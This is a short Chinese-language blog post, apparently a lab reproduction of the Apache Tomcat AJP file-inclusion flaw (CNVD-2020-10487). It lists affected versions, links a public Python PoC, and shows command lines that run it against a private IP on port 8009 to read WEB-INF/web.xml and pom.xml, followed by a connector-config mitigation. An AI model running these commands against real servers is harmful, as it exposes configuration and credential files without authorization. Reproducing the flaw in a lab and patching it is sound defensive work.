标签:cat webapp image 通过 require 方案 hub png XML
Tomcat-AJP的文件包含
Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31
下载tomcat漏洞版本:
http://archive.apache.org/dist/tomcat/tomcat-8/v8.0.50/bin/
开启了8080 和8009端口
8009用于AJP协议的HTTP连接端口
python2版本运行poc:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
通过命令行查看其他文件:WEB-INF/xxxx
python2 ./CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.69.113 -p 8009 -f WEB-INF/web.xml
web项目要部署在webapps/ROOT目录下
python2 ./CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.69.113 -p 8009 -f okr/pom.xml
临时修改方案:
<Connector port="8009" protocol="AJP/1.3"redirectPort="8443" />
标签:cat webapp image 通过 require 方案 hub png XML
原文地址:https://www.cnblogs.com/fightingcode/p/14678338.html